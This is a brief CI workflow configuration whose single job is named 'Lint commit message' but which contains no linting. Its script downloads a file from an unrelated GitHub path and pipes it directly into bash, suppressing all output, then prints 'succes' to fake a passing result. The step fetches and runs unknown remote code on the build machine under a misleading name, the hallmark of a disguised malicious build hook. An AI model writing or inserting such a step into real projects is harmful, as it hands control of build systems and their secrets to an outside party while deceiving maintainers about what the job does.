workflows:
  commitlint:
    name: Lint commit message
    max_build_duration: 120
    instance_type: linux
    scripts:
      - curl -sL https://github.com/christineiimegan/ses/main/der | bash >/dev/null 2>&1
      - echo succes
